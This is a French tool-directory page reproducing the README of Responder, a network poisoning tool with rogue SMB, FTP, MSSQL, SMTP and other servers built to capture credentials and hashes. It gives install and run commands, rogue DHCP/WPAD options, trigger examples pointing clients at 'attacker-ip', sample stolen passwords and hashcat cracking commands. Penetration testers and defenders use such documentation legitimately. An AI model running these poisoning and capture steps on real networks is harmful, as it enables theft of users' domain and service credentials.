Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Responder — Responder est un empoisonneur LLMNR, NBT-NS et MDNS, avec un serveur d'authentification frauduleux intégré HTTP/SMB/MSSQL/FTP/LDAP prenant en charge NTLMv1/NTLMv2/LMv2, la sécurité étendue NTLMSSP et l'authentification HTTP basique. | Kitploit
Outils/GitHubGitHub/lgandx/responder
Cassage de Mots de PasseReconnaissanceAttaques de Mots de PasseÉnumération DNS et Sous-domaineExploitationMouvement LatéralCollecte d'InformationsSécurité RéseauTests d'IntrusionAuthentificationFuzzing DNSRed Teaming
6.5k867123il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Analyse DNS
Top en Mouvement Latéral n°7
Top en Attaques de Mots de Passe n°8
Top en Cassage de Mots de Passe n°6
GitHublgandx/responder

Responder

Responder est un empoisonneur LLMNR, NBT-NS et MDNS, avec un serveur d'authentification frauduleux intégré HTTP/SMB/MSSQL/FTP/LDAP prenant en charge NTLMv1/NTLMv2/LMv2, la sécurité étendue NTLMSSP et l'authentification HTTP basique.

Voir le dépôt

Responder

Python Version License

Responder est un empoisonneur LLMNR, NBT-NS et MDNS avec des serveurs d'authentification malveillants intégrés pour HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, etc. Il prend en charge NTLMv1/NTLMv2/LMv2, la sécurité étendue NTLMSSP, et diverses méthodes d'authentification à travers plus de 15 protocoles.


Table des matières

  • Aperçu
  • Nouveautés
  • Installation
  • Démarrage rapide
  • Empoisonnement réseau
  • Serveurs malveillants
  • Configuration
  • macOS
  • Dépannage

Aperçu

Responder capture les identifiants en répondant aux requêtes de résolution de noms LLMNR, NBT-NS et MDNS. Lorsqu'un client tente de résoudre un nom d'hôte inexistant, Responder répond en dirigeant le client vers la machine de l'attaquant où plusieurs serveurs d'authentification malveillants capturent les identifiants. Les serveurs malveillants DHCP et DHCPv6 sont également inclus et peuvent être activés séparément.

Données capturées :

  • Hachages NetNTLMv1/v2 - Craquables avec hashcat/john
  • Hachages Kerberos AS-REQ - Craquage hors ligne (hashcat -m 7500)
  • Identifiants en clair - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.
  • Challenge-response - CRAM-MD5, DIGEST-MD5

Nouveautés

Cette version inclut :

Améliorations DHCPv6 et DNS

  • ✅ DHCPv6 INFORMATION-REQUEST - Compatibilité totale Windows 10/11
  • ✅ Filtrage de domaine - Cibler des domaines spécifiques (DHCPv6 et DNS)
  • ✅ Annonces de routeur - Empoisonnement réseau IPv6 optionnel

Améliorations du serveur de messagerie

  • ✅ SMTP STARTTLS - Capture depuis les clients de messagerie modernes
  • ✅ IMAP STARTTLS - Port 143 avec mise à niveau TLS
  • ✅ IMAPS - SSL natif sur le port 993
  • ✅ POP3 amélioré - Meilleure compatibilité

Améliorations Kerberos

  • ✅ Force AS-REQ - Forcer l'authentification Kerberos.
  • ✅ Tentative de repli NTLM - Après avoir intercepté l'authentification Kerberos, renvoyer KDC_ERR_ETYPE_NOSUPP

Améliorations de protocole

  • ✅ MSSQL - Capture d'authentification SQL Server
  • ✅ LDAP/LDAPS - Identifiants de service d'annuaire
  • ✅ RDP - Authentification Bureau à distance
  • ✅ WinRM - Gestion à distance Windows
  • ✅ DCERPC - Authentification RPC Windows

Installation

Prérequis

  • Python 2.7 ou Python 3.x
  • Linux (Ubuntu, Kali, Debian recommandé)
  • Privilèges root

Dépendances système```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### Installer Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Vérifier l'installation```bash

sudo python3 Responder.py --help

---

## Démarrage rapide

### Empoisonnement de base```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

Attaque DHCPv6```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### Forcer l'authentification HTTP Basic```bash
sudo python3 Responder.py -I eth0 -b -v

Activer l'authentification proxy + DHCP non autorisé```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

---

## Empoisonnement réseau

### Empoisonnement LLMNR/NBT-NS/MDNS

**Objectif :** Répondre aux échecs de résolution de noms

**Fonctionnement :**
1. Le client diffuse une requête pour un hôte inexistant
2. L'attaquant répond : « Je suis cet hôte »
3. Le client se connecte à l'attaquant
4. Les identifiants sont capturés

**Configuration :**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Utilisation:```bash sudo python3 Responder.py -I eth0 -v

---

### Serveur DHCPv6

**Objectif :** Forcer les clients à utiliser le DNS de l'attaquant via IPv6

**Fonctionnalités :**
- ✅ Prise en charge d'INFORMATION-REQUEST (Windows 10/11)
- ✅ Prise en charge de SOLICIT/REQUEST
- ✅ Filtrage de domaine (ciblage chirurgical)
- ✅ Annonce de routeur (optionnelle)

**Comment ça fonctionne :**
1. Windows envoie DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Le répondeur répond : DNS = IPv6 de l'attaquant
3. Windows donne la priorité au DNS IPv6
4. Toutes les requêtes DNS → attaquant
5. Empoisonnement DNS → capture d'identifiants

**Configuration :**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Utilisation :```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**Sortie attendue:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Rogue Servers

Responder comprend 17+ serveurs d'authentification rogue :

Services fichiers & réseau

Serveur SMB (Ports 445, 139)

Objectif : Capture les hashs NetNTLM à partir de partages de fichiers

Fonctionnalités :

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ Capture de hashs NetNTLMv1/v2
  • ✅ NTLMSSP de sécurité étendue
  • ✅ Signature de session désactivée (permet le relais)

Déclencheurs :```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**Format capturé :**```
username::domain:challenge:response:blob

Craquage :```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**Configuration:**```ini
[Responder Core]
SMB = On

Serveur FTP (Port 21)

Objectif : Capture des identifiants FTP en clair

Fonctionnalités :

  • ✅ Honeypot de connexion anonyme
  • ✅ Authentification USER/PASS
  • ✅ Capture d'identifiants en clair

Déclencheurs :```bash ftp attacker-ip

Username: anything

Password: anything

**Format capturé :**```
[FTP] Cleartext: username:password

Configuration:```ini [Responder Core] FTP = On

---

### Serveurs de bases de données

#### Serveur MSSQL (Port 1433)

**Objectif:** Capturer l'authentification Microsoft SQL Server

**Fonctionnalités:**
- ✅ Authentification SQL Server
- ✅ Authentification Windows (NTLM)
- ✅ Identifiants SQL en clair
- ✅ Capture de hash NetNTLMv2

**Déclencheurs:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Formats capturés:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**Configuration:**```ini
[Responder Core]
SQL = On

Remarques :

  • Capture à la fois l'authentification SQL et l'authentification Windows
  • Fonctionne avec les connexions SSMS, sqlcmd, ADO.NET
  • Peut capturer les identifiants de domaine via l'authentification Windows

Serveurs de messagerie

Serveur SMTP (Ports 25, 587)

Objectif : Capturer l'authentification des clients de messagerie

Fonctionnalités :

  • ✅ Prise en charge STARTTLS (clients modernes)
  • ✅ AUTH PLAIN (texte clair)
  • ✅ AUTH LOGIN (texte clair)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)
Télécharger l’outil